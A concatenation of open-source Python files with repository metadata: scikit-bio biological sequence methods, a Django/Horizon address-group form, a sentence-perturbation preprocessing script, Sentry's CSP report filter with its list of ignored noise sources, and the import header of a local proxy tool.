>>> s.lowercase('introns')
'ACGT'
"""
index = self._munge_to_index_array(lowercase)
outbytes = self._bytes.copy()
outbytes[index] ^= self._ascii_invert_case_bit_offset
return str(outbytes.tostring().decode('ascii'))
@stable(as_of="0.4.0")
def count(self, subsequence, start=None, end=None):
"""Count occurrences of a subsequence in the biological sequence.
Parameters
----------
subsequence : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Subsequence to count occurrences of.
start : int, optional
The position at which to start counting (inclusive).
end : int, optional
The position at which to stop counting (exclusive).
Returns
-------
int
Number of occurrences of `subsequence` in the biological sequence.
Raises
------
ValueError
If `subsequence` is of length 0.
TypeError
If `subsequence` is a ``Sequence`` object with a different type
than the biological sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUCG')
>>> s.count('G')
3
>>> s.count('GG')
1
>>> s.count('T')
0
>>> s.count('G', 2, 5)
1
"""
if len(subsequence) == 0:
raise ValueError("`count` is not defined for empty subsequences.")
return self._string.count(
self._munge_to_bytestring(subsequence, "count"), start, end)
@stable(as_of="0.4.0")
def index(self, subsequence, start=None, end=None):
"""Find position where subsequence first occurs in the sequence.
Parameters
----------
subsequence : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Subsequence to search for in the biological sequence.
start : int, optional
The position at which to start searching (inclusive).
end : int, optional
The position at which to stop searching (exclusive).
Returns
-------
int
Position where `subsequence` first occurs in the biological
sequence.
Raises
------
ValueError
If `subsequence` is not present in the biological sequence.
TypeError
If `subsequence` is a ``Sequence`` object with a different type
than the biological sequence.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('ACACGACGTT-')
>>> s.index('ACG')
2
"""
try:
return self._string.index(
self._munge_to_bytestring(subsequence, "index"), start, end)
except ValueError:
raise ValueError(
"%r is not present in %r." % (subsequence, self))
@experimental(as_of="0.4.0")
def distance(self, other, metric=None):
"""Compute the distance to another sequence.
Parameters
----------
other : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Sequence to compute the distance to.
metric : function, optional
Function used to compute the distance between the biological
sequence and `other`. If ``None`` (the default),
``scipy.spatial.distance.hamming`` will be used. This function
should take two ``skbio.Sequence`` objects and return a ``float``.
Returns
-------
float
Distance between the biological sequence and `other`.
Raises
------
ValueError
If the sequences are not the same length when `metric` is ``None``
(i.e., `metric` is ``scipy.spatial.distance.hamming``). This is
only checked when using this metric, as equal length is not a
requirement of all sequence distance metrics. In general, the
metric itself should test and give an informative error message,
but the message from ``scipy.spatial.distance.hamming`` is somewhat
cryptic (as of this writing), and it's the default metric, so we
explicitly do this check here. This metric-specific check will be
removed from this method when the ``skbio.sequence.stats`` module
is created (track progress on issue #913).
TypeError
If `other` is a ``Sequence`` object with a different type than the
biological sequence.
See Also
--------
fraction_diff
fraction_same
scipy.spatial.distance.hamming
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> t = Sequence('AGUC')
>>> s.distance(t)
0.25
>>> def custom_dist(s1, s2): return 0.42
>>> s.distance(t, custom_dist)
0.42
"""
# TODO refactor this method to accept a name (string) of the distance
# metric to apply and accept **kwargs
other = self._munge_to_sequence(other, 'distance')
if metric is None:
return self._hamming(other)
return float(metric(self, other))
def _hamming(self, other):
# Hamming requires equal length sequences. We are checking this
# here because the error you would get otherwise is cryptic.
if len(self) != len(other):
raise ValueError(
"Sequences do not have equal length. "
"Hamming distances can only be computed between "
"sequences of equal length.")
return float(hamming(self.values, other.values))
@stable(as_of="0.4.0")
def matches(self, other):
"""Find positions that match with another sequence.
Parameters
----------
other : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Sequence to compare to.
Returns
-------
1D np.ndarray (bool)
Boolean vector where ``True`` at position ``i`` indicates a match
between the sequences at their positions ``i``.
Raises
------
ValueError
If the sequences are not the same length.
TypeError
If `other` is a ``Sequence`` object with a different type than the
biological sequence.
See Also
--------
mismatches
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> t = Sequence('GAUU')
>>> s.matches(t)
array([ True, False, True, False], dtype=bool)
"""
other = self._munge_to_sequence(other, 'matches/mismatches')
if len(self) != len(other):
raise ValueError("Match and mismatch vectors can only be "
"generated from equal length sequences.")
return self._bytes == other._bytes
@stable(as_of="0.4.0")
def mismatches(self, other):
"""Find positions that do not match with another sequence.
Parameters
----------
other : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Sequence to compare to.
Returns
-------
1D np.ndarray (bool)
Boolean vector where ``True`` at position ``i`` indicates a
mismatch between the sequences at their positions ``i``.
Raises
------
ValueError
If the sequences are not the same length.
TypeError
If `other` is a ``Sequence`` object with a different type than the
biological sequence.
See Also
--------
matches
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> t = Sequence('GAUU')
>>> s.mismatches(t)
array([False, True, False, True], dtype=bool)
"""
return np.invert(self.matches(other))
@stable(as_of="0.4.0")
def match_frequency(self, other, relative=False):
"""Return count of positions that are the same between two sequences.
Parameters
----------
other : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Sequence to compare to.
relative : bool, optional
If ``True``, return the relative frequency of matches instead of
the count.
Returns
-------
int or float
Number of positions that are the same between the sequences. This
will be an ``int`` if `relative` is ``False`` and a ``float``
if `relative` is ``True``.
Raises
------
ValueError
If the sequences are not the same length.
TypeError
If `other` is a ``Sequence`` object with a different type than the
biological sequence.
See Also
--------
mismatch_frequency
matches
mismatches
distance
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> t = Sequence('AGUC')
>>> s.match_frequency(t)
3
>>> s.match_frequency(t, relative=True)
0.75
"""
if relative:
return float(self.matches(other).mean())
else:
return int(self.matches(other).sum())
@stable(as_of="0.4.0")
def mismatch_frequency(self, other, relative=False):
"""Return count of positions that differ between two sequences.
Parameters
----------
other : str, Sequence, or 1D np.ndarray (np.uint8 or '\|S1')
Sequence to compare to.
relative : bool, optional
If ``True``, return the relative frequency of mismatches instead of
the count.
Returns
-------
int or float
Number of positions that differ between the sequences. This will be
an ``int`` if `relative` is ``False`` and a ``float``
if `relative` is ``True``.
Raises
------
ValueError
If the sequences are not the same length.
TypeError
If `other` is a ``Sequence`` object with a different type than the
biological sequence.
See Also
--------
match_frequency
matches
mismatches
distance
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('GGUC')
>>> t = Sequence('AGUC')
>>> s.mismatch_frequency(t)
1
>>> s.mismatch_frequency(t, relative=True)
0.25
"""
if relative:
return float(self.mismatches(other).mean())
else:
return int(self.mismatches(other).sum())
@experimental(as_of="0.4.0-dev")
def frequencies(self, chars=None, relative=False):
"""Compute frequencies of characters in the sequence.
Parameters
----------
chars : str or set of str, optional
Characters to compute the frequencies of. May be a ``str``
containing a single character or a ``set`` of single-character
strings. If ``None``, frequencies will be computed for all
characters present in the sequence.
relative : bool, optional
If ``True``, return the relative frequency of each character
instead of its count. If `chars` is provided, relative frequencies
will be computed with respect to the number of characters in the
sequence, **not** the total count of characters observed in
`chars`. Thus, the relative frequencies will not necessarily sum to
1.0 if `chars` is provided.
Returns
-------
dict
Frequencies of characters in the sequence.
Raises
------
TypeError
If `chars` is not a ``str`` or ``set`` of ``str``.
ValueError
If `chars` is not a single-character ``str`` or a ``set`` of
single-character strings.
ValueError
If `chars` contains characters outside the allowable range of
characters in a ``Sequence`` object.
See Also
--------
kmer_frequencies
iter_kmers
Notes
-----
If the sequence is empty (i.e., length zero), ``relative=True``,
**and** `chars` is provided, the relative frequency of each specified
character will be ``np.nan``.
If `chars` is not provided, this method is equivalent to, but faster
than, ``seq.kmer_frequencies(k=1)``.
If `chars` is not provided, it is equivalent to, but faster than,
passing ``chars=seq.observed_chars``.
Examples
--------
Compute character frequencies of a sequence:
>>> from pprint import pprint
>>> from skbio import Sequence
>>> seq = Sequence('AGAAGACC')
>>> freqs = seq.frequencies()
>>> pprint(freqs) # using pprint to display dict in sorted order
{'A': 4, 'C': 2, 'G': 2}
Compute relative character frequencies:
>>> freqs = seq.frequencies(relative=True)
>>> pprint(freqs)
{'A': 0.5, 'C': 0.25, 'G': 0.25}
Compute relative frequencies of characters A, C, and T:
>>> freqs = seq.frequencies(chars={'A', 'C', 'T'}, relative=True)
>>> pprint(freqs)
{'A': 0.5, 'C': 0.25, 'T': 0.0}
Note that since character T is not in the sequence we receive a
relative frequency of 0.0. The relative frequencies of A and C are
relative to the number of characters in the sequence (8), **not** the
number of A and C characters (4 + 2 = 6).
"""
freqs = np.bincount(self._bytes,
minlength=self._number_of_extended_ascii_codes)
if chars is not None:
chars, indices = self._chars_to_indices(chars)
else:
indices, = np.nonzero(freqs)
# Downcast from int64 to uint8 then convert to str. This is safe
# because we are guaranteed to have indices in the range 0 to 255
# inclusive.
chars = indices.astype(np.uint8).tostring().decode('ascii')
obs_counts = freqs[indices]
if relative:
obs_counts = obs_counts / len(self)
# Use tolist() for minor performance gain.
return dict(zip(chars, obs_counts.tolist()))
def _chars_to_indices(self, chars):
"""Helper for Sequence.frequencies."""
if isinstance(chars, six.string_types) or \
isinstance(chars, six.binary_type):
chars = set([chars])
elif not isinstance(chars, set):
raise TypeError(
"`chars` must be of type `set`, not %r" % type(chars).__name__)
# Impose an (arbitrary) ordering to `chars` so that we can return
# `indices` in that same order.
chars = list(chars)
indices = []
for char in chars:
if not (isinstance(char, six.string_types) or
isinstance(char, six.binary_type)):
raise TypeError(
"Each element of `chars` must be string-like, not %r" %
type(char).__name__)
if len(char) != 1:
raise ValueError(
"Each element of `chars` must contain a single "
"character (found %d characters)" % len(char))
index = ord(char)
if index >= self._number_of_extended_ascii_codes:
raise ValueError(
"Character %r in `chars` is outside the range of "
"allowable characters in a `Sequence` object." % char)
indices.append(index)
return chars, indices
@stable(as_of="0.4.0")
def iter_kmers(self, k, overlap=True):
"""Generate kmers of length `k` from the biological sequence.
Parameters
----------
k : int
The kmer length.
overlap : bool, optional
Defines whether the kmers should be overlapping or not.
Yields
------
Sequence
kmer of length `k` contained in the biological sequence.
Raises
------
ValueError
If `k` is less than 1.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('ACACGACGTT')
>>> for kmer in s.iter_kmers(4, overlap=False):
... str(kmer)
'ACAC'
'GACG'
>>> for kmer in s.iter_kmers(3, overlap=True):
... str(kmer)
'ACA'
'CAC'
'ACG'
'CGA'
'GAC'
'ACG'
'CGT'
'GTT'
"""
if k < 1:
raise ValueError("k must be greater than 0.")
if overlap:
step = 1
count = len(self) - k + 1
else:
step = k
count = len(self) // k
if self.has_positional_metadata():
for i in range(0, len(self) - k + 1, step):
yield self[i:i+k]
# Optimized path when no positional metadata
else:
kmers = np.lib.stride_tricks.as_strided(
self._bytes, shape=(k, count), strides=(1, step)).T
for s in kmers:
yield self._to(sequence=s)
@stable(as_of="0.4.0")
def kmer_frequencies(self, k, overlap=True, relative=False):
"""Return counts of words of length `k` from the biological sequence.
Parameters
----------
k : int
The word length.
overlap : bool, optional
Defines whether the kmers should be overlapping or not.
relative : bool, optional
If ``True``, return the relative frequency of each kmer instead of
its count.
Returns
-------
dict
Frequencies of words of length `k` contained in the biological
sequence.
Raises
------
ValueError
If `k` is less than 1.
Examples
--------
>>> from pprint import pprint
>>> from skbio import Sequence
>>> s = Sequence('ACACATTTATTA')
>>> freqs = s.kmer_frequencies(3, overlap=False)
>>> pprint(freqs) # using pprint to display dict in sorted order
{'ACA': 1, 'CAT': 1, 'TTA': 2}
>>> freqs = s.kmer_frequencies(3, relative=True, overlap=False)
>>> pprint(freqs)
{'ACA': 0.25, 'CAT': 0.25, 'TTA': 0.5}
"""
kmers = self.iter_kmers(k, overlap=overlap)
freqs = dict(collections.Counter((str(seq) for seq in kmers)))
if relative:
if overlap:
num_kmers = len(self) - k + 1
else:
num_kmers = len(self) // k
relative_freqs = {}
for kmer, count in viewitems(freqs):
relative_freqs[kmer] = count / num_kmers
freqs = relative_freqs
return freqs
@stable(as_of="0.4.0")
def find_with_regex(self, regex, ignore=None):
"""Generate slices for patterns matched by a regular expression.
Parameters
----------
regex : str or regular expression object
String to be compiled into a regular expression, or a pre-
compiled regular expression object (e.g., from calling
``re.compile``).
ignore : 1D array_like (bool) or iterable (slices or ints), optional
Indicate the positions to ignore when matching.
Yields
------
slice
Location where the regular expression matched.
Examples
--------
>>> from skbio import Sequence
>>> s = Sequence('AATATACCGGTTATAA')
>>> for match in s.find_with_regex('(TATA+)'):
... match
... str(s[match])
slice(2, 6, None)
'TATA'
slice(11, 16, None)
'TATAA'
"""
if isinstance(regex, six.string_types):
regex = re.compile(regex)
lookup = np.arange(len(self))
if ignore is None:
string = str(self)
else:
ignore = self._munge_to_index_array(ignore)
lookup = np.delete(lookup, ignore)
string = str(self[lookup])
for match in regex.finditer(string):
# We start at 1 because we don't want the group that contains all
# other groups.
for g in range(1, len(match.groups())+1):
yield slice(lookup[match.start(g)],
lookup[match.end(g) - 1] + 1)
@stable(as_of="0.4.0")
def iter_contiguous(self, included, min_length=1, invert=False):
"""Yield contiguous subsequences based on `included`.
Parameters
----------
included : 1D array_like (bool) or iterable (slices or ints)
`included` is transformed into a flat boolean vector where each
position will either be included or skipped. All contiguous
included positions will be yielded as a single region.
min_length : int, optional
The minimum length of a subsequence for it to be yielded.
Default is 1.
invert : bool, optional
Whether to invert `included` such that it describes what should be
skipped instead of included. Default is False.
Yields
------
Sequence
Contiguous subsequence as indicated by `included`.
Notes
-----
If slices provide adjacent ranges, then they will be considered the
same contiguous subsequence.
Examples
--------
Here we use `iter_contiguous` to find all of the contiguous ungapped
sequences using a boolean vector derived from our DNA sequence.
>>> from skbio import DNA
>>> s = DNA('AAA--TT-CCCC-G-')
>>> no_gaps = ~s.gaps()
>>> for ungapped_subsequence in s.iter_contiguous(no_gaps,
... min_length=2):
... print(ungapped_subsequence)
AAA
TT
CCCC
Note how the last potential subsequence was skipped because it would
have been smaller than our `min_length` which was set to 2.
We can also use `iter_contiguous` on a generator of slices as is
produced by `find_motifs` (and `find_with_regex`).
>>> from skbio import Protein
>>> s = Protein('ACDFNASANFTACGNPNRTESL')
>>> for subseq in s.iter_contiguous(s.find_motifs('N-glycosylation')):
... print(subseq)
NASANFTA
NRTE
Note how the first subsequence contains two N-glycosylation sites. This
happened because they were contiguous.
"""
idx = self._munge_to_index_array(included)
if invert:
idx = np.delete(np.arange(len(self)), idx)
# Adapted from http://stackoverflow.com/a/7353335/579416
for contig in np.split(idx, np.where(np.diff(idx) != 1)[0] + 1):
r = self[contig]
if len(r) >= min_length:
yield r
def _to(self, sequence=None, metadata=None, positional_metadata=None):
"""Return a copy of the current biological sequence.
Returns a copy of the current biological sequence, optionally with
updated attributes specified as keyword arguments.
Arguments are the same as those passed to the ``Sequence`` constructor.
The returned copy will have its attributes updated based on the
arguments. If an attribute is missing, the copy will keep the same
attribute as the current biological sequence. Valid attribute names
are `'sequence'`, `'metadata'`, and `'positional_metadata'`. Default
behavior is to return a copy of the current biological sequence
without changing any attributes.
Parameters
----------
sequence : optional
metadata : optional
positional_metadata : optional
Returns
-------
Sequence
Copy of the current biological sequence, optionally with updated
attributes based on arguments. Will be the same type as the current
biological sequence (`self`).
Notes
-----
By default, `metadata` and `positional_metadata` are shallow-copied and
the reference to `sequence` is used (without copying) for efficiency
since `sequence` is immutable. This differs from the behavior of
`Sequence.copy`, which will actually copy `sequence`.
This method is the preferred way of creating new instances from an
existing biological sequence, instead of calling
``self.__class__(...)``, as the latter can be error-prone (e.g.,
it's easy to forget to propagate attributes to the new instance).
"""
if sequence is None:
sequence = self._bytes
if metadata is None and self.has_metadata():
metadata = self._metadata
if positional_metadata is None and self.has_positional_metadata():
positional_metadata = self._positional_metadata
return self._constructor(sequence=sequence, metadata=metadata,
positional_metadata=positional_metadata)
def _constructor(self, **kwargs):
return self.__class__(**kwargs)
def _munge_to_index_array(self, sliceable):
"""Return an index array from something isomorphic to a boolean vector.
"""
if isinstance(sliceable, six.string_types):
if sliceable in self.positional_metadata:
if self.positional_metadata[sliceable].dtype == np.bool:
sliceable = self.positional_metadata[sliceable]
else:
raise TypeError("Column '%s' in positional metadata does "
"not correspond to a boolean vector" %
sliceable)
else:
raise ValueError("No positional metadata associated with key "
"'%s'" % sliceable)
if not hasattr(sliceable, 'dtype') or (hasattr(sliceable, 'dtype') and
sliceable.dtype == 'object'):
sliceable = tuple(sliceable)
bool_mode = False
int_mode = False
for s in sliceable:
if isinstance(s, (bool, np.bool_)):
bool_mode = True
elif isinstance(s, (slice, int, np.signedinteger)) or (
hasattr(s, 'dtype') and s.dtype != np.bool):
int_mode = True
else:
raise TypeError("Invalid type in iterable: %s, must be one"
" of {bool, int, slice, np.signedinteger}"
% s.__class__.__name__)
if bool_mode and int_mode:
raise TypeError("Cannot provide iterable of both bool and"
" int.")
sliceable = np.r_[sliceable]
if sliceable.dtype == np.bool:
if sliceable.size != len(self):
raise ValueError("Boolean array (%d) does not match length of"
" sequence (%d)."
% (sliceable.size, len(self)))
normalized, = np.where(sliceable)
else:
normalized = np.bincount(sliceable)
if np.any(normalized > 1):
raise ValueError("Overlapping index regions are not allowed.")
normalized, = np.where(normalized)
if np.any(normalized != sliceable):
raise ValueError("Index regions are out of order.")
return normalized
def _munge_to_sequence(self, other, method):
if isinstance(other, Sequence):
if type(other) != type(self):
raise TypeError("Cannot use %s and %s together with `%s`" %
(self.__class__.__name__,
other.__class__.__name__, method))
else:
return other
# We don't use self.__class__ or self._constructor here because we want
# to construct the most general type of Sequence object in order to
# avoid validation errors.
return Sequence(other)
def _munge_to_bytestring(self, other, method):
if type(other) is bytes:
return other
elif isinstance(other, six.string_types):
return other.encode('ascii')
else:
return self._munge_to_sequence(other, method)._string
@contextmanager
def _byte_ownership(self):
if not self._owns_bytes:
self._bytes = self._bytes.copy()
self._owns_bytes = True
self._bytes.flags.writeable = True
yield
self._bytes.flags.writeable = False
def _single_index_to_slice(start_index):
end_index = None if start_index == -1 else start_index+1
return slice(start_index, end_index)
def _is_single_index(index):
return (isinstance(index, numbers.Integral) and
not isinstance(index, bool))
def _as_slice_if_single_index(indexable):
if _is_single_index(indexable):
return _single_index_to_slice(indexable)
else:
return indexable
def _slices_from_iter(array, indexables):
for i in indexables:
if isinstance(i, slice):
pass
elif _is_single_index(i):
i = _single_index_to_slice(i)
else:
raise IndexError("Cannot slice sequence from iterable "
"containing %r." % i)
yield array[i]
|
{
"content_hash": "f7d235fc4a5ccce3405fe8e901eebdc0",
"timestamp": "",
"source": "github",
"line_count": 2453,
"max_line_length": 79,
"avg_line_length": 32.657969832857724,
"alnum_prop": 0.5366620896267632,
"repo_name": "jdrudolph/scikit-bio",
"id": "44a8674bcd34bdf1c69581b476e4af1386f00ab6",
"size": "80464",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "skbio/sequence/_sequence.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "39087"
},
{
"name": "CSS",
"bytes": "4379"
},
{
"name": "Groff",
"bytes": "259"
},
{
"name": "Makefile",
"bytes": "1054"
},
{
"name": "Python",
"bytes": "2265718"
}
],
"symlink_target": ""
}
|
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from akanda.horizon.api import neutron_extensions_client
from akanda.horizon.tabs import alias_tab_redirect
class BaseHostAliasForm(forms.SelfHandlingForm):
"""
"""
id = forms.CharField(
label=_("Id"), widget=forms.HiddenInput, required=False)
name = forms.CharField(label=_("Name"), max_length=255)
class CreateHostAliasForm(BaseHostAliasForm):
"""
"""
def handle(self, request, data):
try:
result = self._create_host_alias(request, data)
messages.success(
request,
_('Successfully created Address Group: %s') % data['name'])
return result
except:
redirect = "%s?tab=%s" % (
reverse("horizon:project:networking:index"),
alias_tab_redirect())
exceptions.handle(request, _('Unable to create Address Group.'),
redirect=redirect)
def _create_host_alias(self, request, data):
return neutron_extensions_client.addressgroup_create(request, data)
class EditHostAliasForm(BaseHostAliasForm):
"""
"""
def handle(self, request, data):
try:
self._update_host_alias(request, data)
messages.success(
request,
_('Successfully updated Address Group: %s') % data['name'])
return data
except:
redirect = "%s?tab=%s" % (
reverse("horizon:project:networking:index"),
alias_tab_redirect())
exceptions.handle(request, _('Unable to update Address Group.'),
redirect=redirect)
def _update_host_alias(self, request, data):
return neutron_extensions_client.addressgroup_update(request, data)
|
{
"content_hash": "f124933e29d610311181ca7c6507e428",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 76,
"avg_line_length": 33.40677966101695,
"alnum_prop": 0.602232369355657,
"repo_name": "dreamhost/akanda-horizon",
"id": "d25dfb5ee087c9d4216ce16a40f53410de2a8124",
"size": "2579",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "akanda/horizon/alias/forms/hosts.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "151"
},
{
"name": "JavaScript",
"bytes": "122"
},
{
"name": "Python",
"bytes": "141454"
}
],
"symlink_target": ""
}
|
"""Preprocess the input to include sentences with edit distance one."""
import collections
import random
import tensorflow.compat.v1 as tf
app = tf.app
flags = tf.flags
gfile = tf.gfile
logging = tf.logging
flags.DEFINE_string("input_path", None, "Path containing sentence data")
flags.DEFINE_integer("num_pertubations", 1, "Number of random flips to be made")
flags.DEFINE_float("fraction", 1, "What fraction of data should be used")
flags.DEFINE_integer("random_seed", 42, "")
flags.DEFINE_bool("keep_only_original", False,
"Should only original subset be preserved")
flags.DEFINE_bool("export_other", False, "Export the other fraction of data")
flags.DEFINE_string("output_path", None, "Output path for preprocessed data")
FLAGS = flags.FLAGS
def build_vocab(sents_data):
# find all words in corpus to build a vocabulary
vocab = collections.defaultdict(int)
for sent in sents_data:
original_sent = sent.split("\t")[0].split()
for word in original_sent:
vocab[word] = 1
# convert it to a list for future
vocab = list(vocab.keys())
return vocab
def build_subset(sents_data):
subset_size = int(FLAGS.fraction * len(sents_data))
random.shuffle(sents_data)
if FLAGS.export_other:
return sents_data[subset_size:]
else:
return sents_data[:subset_size]
def main(_):
random.seed(FLAGS.random_seed)
with gfile.Open(FLAGS.input_path, "r") as f:
sents_data = f.read().strip().split("\n")
header = sents_data[0]
sents_data = sents_data[1:]
vocab = build_vocab(sents_data)
subset_sents_data = build_subset(sents_data)
output_data = []
for sent in subset_sents_data:
output_data.append(sent)
data_point_parts = sent.split("\t")
original_sent = data_point_parts[0].split()
if FLAGS.keep_only_original:
continue
# For each pertubation, construct a new sentence and randomly replace a word
for _ in range(FLAGS.num_pertubations):
pertubed = list(original_sent)
pertubed[random.randint(0, len(original_sent) - 1)] = random.choice(vocab)
output_data.append(" ".join(pertubed) + " \t" +
"\t".join(data_point_parts[1:]))
output_data = [header] + output_data
with gfile.Open(FLAGS.output_path, "w") as f:
f.write("\n".join(output_data) + "\n")
return
if __name__ == "__main__":
app.run(main)
|
{
"content_hash": "ab625b1aaf5ea2814f871cb2514f03c1",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 80,
"avg_line_length": 28.42168674698795,
"alnum_prop": 0.6748622297583722,
"repo_name": "google-research/language",
"id": "c75e20e24e03956a45d1dbb13d4a3a672ae7e0db",
"size": "2974",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "language/bert_extraction/steal_bert_classifier/data_generation/preprocess_edit_distance_one.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "9834"
},
{
"name": "CSS",
"bytes": "602"
},
{
"name": "HTML",
"bytes": "25162"
},
{
"name": "JavaScript",
"bytes": "8857"
},
{
"name": "Jupyter Notebook",
"bytes": "1505066"
},
{
"name": "Python",
"bytes": "7139472"
},
{
"name": "Shell",
"bytes": "183709"
}
],
"symlink_target": ""
}
|
"""
sentry.utils.csp
~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2015 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from sentry.utils.http import is_valid_origin
# Default block list sourced from personal experience as well as
# reputable blogs from Twitter and Dropbox
DISALLOWED_SOURCES = (
'chrome://*',
'chrome-extension://*',
'chromeinvokeimmediate://*'
'chromenull://*',
'safari-extension://*',
'mxaddon-pkg://*',
'jar://*',
'webviewprogressproxy://*',
'tmtbff://*',
'mbinit://*',
'symres://*',
'resource://*',
'*.metrext.com',
'static.image2play.com',
'*.tlscdn.com',
'73a5b0806e464be8bd4e694c744624f0.com',
'020dfefc4ac745dab7594f2f771c1ded.com',
'*.superfish.com',
'addons.mozilla.org',
'v.zilionfast.in',
'widgets.amung.us',
'*.superfish.com',
'xls.searchfun.in',
'istatic.datafastguru.info',
'v.zilionfast.in',
'localhost',
'resultshub-a.akamaihd.net',
'pulseadnetwork.com',
'gateway.zscalertwo.net',
'www.passpack.com',
'middlerush-a.akamaihd.net',
'www.websmartcenter.com',
'a.linkluster.com',
'saveyoutime.ru',
'cdncache-a.akamaihd.net',
'x.rafomedia.com',
'savingsslider-a.akamaihd.net',
'injections.adguard.com',
'icontent.us',
'amiok.org',
'connectionstrenth.com',
'siteheart.net',
)
ALLOWED_DIRECTIVES = frozenset((
'base-uri', 'child-src', 'connect-src', 'default-src',
'font-src', 'form-action', 'frame-ancestors',
'img-src', 'manifest-src', 'media-src', 'object-src',
'plugin-types', 'referrer', 'script-src', 'style-src',
'upgrade-insecure-requests',
# Deprecated directives
# > Note: This directive is deprecated. Use child-src instead.
# > https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives#frame-src
# 'frame-src',
# I don't really know what this even is.
# 'sandbox',
))
# URIs that are pure noise and will never be actionable
DISALLOWED_BLOCKED_URIS = frozenset((
'about',
'ms-browser-extension',
))
def is_valid_csp_report(report, project=None):
# Some reports from Chrome report blocked-uri as just 'about'.
# In this case, this is not actionable and is just noisy.
# Observed in Chrome 45 and 46.
if report.get('effective_directive') not in ALLOWED_DIRECTIVES:
return False
blocked_uri = report.get('blocked_uri')
if blocked_uri in DISALLOWED_BLOCKED_URIS:
return False
source_file = report.get('source_file')
# We must have one of these to do anyting sensible
if not any((blocked_uri, source_file)):
return False
if project is None or bool(project.get_option('sentry:csp_ignored_sources_defaults', True)):
disallowed_sources = DISALLOWED_SOURCES
else:
disallowed_sources = ()
if project is not None:
disallowed_sources += tuple(project.get_option('sentry:csp_ignored_sources', []))
if not disallowed_sources:
return True
if source_file and is_valid_origin(source_file, allowed=disallowed_sources):
return False
if blocked_uri and is_valid_origin(blocked_uri, allowed=disallowed_sources):
return False
return True
|
{
"content_hash": "9391d8cdf536e3e8424efdfe8c83b0be",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 97,
"avg_line_length": 28.495726495726494,
"alnum_prop": 0.6484703059388123,
"repo_name": "JackDanger/sentry",
"id": "ff8d8ddf5c6d667a66436238504dc9829d484664",
"size": "3334",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/sentry/utils/csp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "583430"
},
{
"name": "HTML",
"bytes": "319622"
},
{
"name": "JavaScript",
"bytes": "624672"
},
{
"name": "Makefile",
"bytes": "2660"
},
{
"name": "Python",
"bytes": "6279717"
}
],
"symlink_target": ""
}
|
__version__ = '3.2.3'
import os
import sys
import sysconfig
import platform
#reload(sys).setdefaultencoding('UTF-8')
sys.dont_write_bytecode = True
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir))
python_path = os.path.join(root_path, 'python27', '1.0')
noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)
if sys.platform == "win32":
win32_lib = os.path.abspath( os.path.join(python_path, 'lib', 'win32'))
sys.path.append(win32_lib)
elif sys.platform == "linux" or sys.platform == "linux2":
linux_lib = os.path.abspath( os.path.join(python_path, 'lib', 'linux'))
sys.path.append(linux_lib)
elif sys.platform == "darwin":
darwin_lib = os.path.abspath( os.path.join(python_path, 'lib', 'darwin'))
sys.path.append(darwin_lib)
extra_lib = "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python"
sys.path.append(extra_lib)
from cert_util import CertUtil
try:
__import__('gevent.monkey', fromlist=['.']).patch_all()
except (ImportError, SystemError) as e:
print "import gevent fail:", e
sys.exit(sys.stderr.write('please install python-gevent\n'))
import base64
import collections
import ConfigParser
import errno
import httplib
import io
import Queue
import random
import re
import socket
import ssl
import struct
import thread
import threading
import time
import urllib2
import urlparse
import gevent
import OpenSSL
NetWorkIOError = (socket.error, ssl.SSLError, OpenSSL.SSL.Error, OSError)
import logging
from proxylib import AuthFilter
from proxylib import AutoRangeFilter
from proxylib import BaseFetchPlugin
from proxylib import BaseProxyHandlerFilter
from proxylib import BlackholeFilter
from proxylib import CipherFileObject
from proxylib import deflate
from proxylib import DirectFetchPlugin
from proxylib import DirectRegionFilter
from proxylib import dnslib_record2iplist
from proxylib import dnslib_resolve_over_tcp
from proxylib import dnslib_resolve_over_udp
from proxylib import FakeHttpsFilter
from proxylib import ForceHttpsFilter
from proxylib import CRLFSitesFilter
from proxylib import get_dnsserver_list
from proxylib import get_uptime
from proxylib import inflate
from proxylib import LocalProxyServer
from proxylib import message_html
from proxylib import MockFetchPlugin
from proxylib import MultipleConnectionMixin
from proxylib import openssl_set_session_cache_mode
from proxylib import ProxyConnectionMixin
from proxylib import ProxyUtil
from proxylib import RC4Cipher
from proxylib import SimpleProxyHandler
from proxylib import spawn_later
from proxylib import SSLConnection
from proxylib import StaticFileFilter
from proxylib import StripPlugin
from proxylib import StripPluginEx
from proxylib import URLRewriteFilter
from proxylib import UserAgentFilter
from proxylib import XORCipher
import web_control
